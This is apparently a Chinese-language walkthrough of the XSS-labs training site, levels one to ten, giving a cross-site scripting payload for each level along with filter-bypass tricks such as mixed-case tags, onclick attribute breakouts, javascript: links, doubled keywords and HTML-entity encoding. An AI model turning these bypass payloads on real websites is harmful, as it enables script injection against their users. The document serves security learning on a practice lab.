XSS-labs通关教程-完结

XSS-labs通关教程-完结

1.第一关

payload:

cobol 复制代码
http://xss/level1.php?name=<Script>alert(1)</Script>

2.第二关

这里变量出现在两处,我们直接利用第二处,做构造以及闭合

查询框里输入payload

payload:

xml 复制代码
1"><ScRipt>alert(1)</ScRipt>

3.第三关

用第二关的payload去试一下,发现内容没变化,但是就是没当成js代码

查一下网页源代码和php代码

看到使用了htmlspecialchars方法,它的作用是将特殊符号转换成HTML实体。那么什么是HTML实体呢?

说白了就是HTML为了防止特殊符号,如 "<"等,html当成标签

这时候我们的思路就尽量要绕开使用新标签,那么浏览器还有一些事件可以执行js代码,如onfocus,onblur,但是这两个是属于输入框在光标进入/离开时调用后面的js代码(可以用函数形式或者javascript:~~)

输入到代码框后选择到文件上,点击一下就行

payload:

复制代码
' onclick ='javascript:alert(1)'//

4.第四关

同第三关(把单引号换成双引号)

payload:

复制代码
" onclick ="javascript:alert(1)"//

5.第五关

script过滤了,onclick也过滤了

尝试构造a标签

xml 复制代码
"></input><a href='javascript:alert(1)'>asd</a>//

5.第六关

同第二关

payload:

xml 复制代码
1"><ScRipt>alert(1)</ScRipt>

7. 第七关

删去了script,这个简单看看是不是过滤了一次,将script变成scrscriptipt

payload:

xml 复制代码
1"><ScscriptRipt>alert(1)</ScscriptRipt>

8. 第八关

老规矩拿第6关的payload试验一下,然后看网页源代码

上边过滤了<>特殊符号

下边在script中间加了个下划线

但是注意看下边代码再href里

我们这里只是想把href的内容变成javascript:alert(1),而不涉及标签的修改,所以直接编码绕过

payload:

复制代码
javascript:alert(1)
cobol 复制代码
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;

9.第九关

先来波检测,填入它然后查源代码,看过滤情况

xml 复制代码
<>"'script onclick

查看源码,发现双引号和尖括号都给过滤了,但是下边发现了,您的链接不合法,那我填个合法的

那我们再动动手脚

cobol 复制代码
javascript:alert(1);http://www.baidu.com

还是不行

那编码呗(第八关的后边加个注释再加个网址)

==注意:==后边的//注释一定要加,不然它就驴唇不对马嘴,自然浏览器也懵逼,所以要把后边的网址注释掉。

payload:

cobol 复制代码
javascript:alert(1)//http://www.baidu.com

变换后payload

cobol 复制代码
&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x27;&#x31;&#x27;&#x29; //http://www.baidu.com

10.第十关

重点注意输入是在URL里

还是'' ' >< script onclick测试一遍,发现只过滤了" 和<>,但是发现了三个隐藏的input,那么根据他们的name构造传值,让它们的type改变,不再隐藏,谁出来了谁就能利用,查看源码

想办法把源代码构造闭合

cobol 复制代码
<input name="t_sort"  value="'.$str33.'" type="hidden">
<input name="t_sort"  value="" type='text' onclick='javascript:alert(1)'>// type="hidden">

payload:

cobol 复制代码
&t_sort=" type='text' onclick='javascript:alert(1)'>//
相关推荐
梦帮科技4 小时前
GRAVIS v4.0:基于Web的极速套利架构设计与实时数据流实现
前端·人工智能·rust·自动化·区块链·智能合约·数字货币
爱勇宝5 小时前
办公资料反复修改、补传、交接混乱,我做了个桌面工具来解决这件事
前端·后端·程序员
微信开发api-视频号协议6 小时前
企业微信外部群开发自动化实践过程
java·前端·微信·自动化·企业微信·ipad
甲维斯6 小时前
Fable5:20美金的顶级设计师!
前端·人工智能
kyriewen6 小时前
我同时用了 Claude Code、Cursor 和 Codex,说说三个工具的真实差距——2026 年选错工具比不用 AI 更浪费时间
前端·ai编程·claude
Jackson__6 小时前
为了拯救我的腰椎和颈椎,我做了款浏览器插件!
前端·javascript·开源
闲猫7 小时前
Python FastAPI + SQLAlchemy 入门教程:从零搭建你的第一个 Web 应用
前端·python·fastapi
林小帅7 小时前
NestJS v11 + Prisma v7 ESM 迁移配置解析
前端·javascript·后端
IT_陈寒7 小时前
React的setState竟然不是立刻生效的,害我调试半天
前端·人工智能·后端
简简单单就是我_hehe7 小时前
前端埋点日志解决方案:完整 User-Agent 解析工具实现,爬虫识别、设备品牌、操作系统、浏览器版本全解析(附完整源码)
前端·爬虫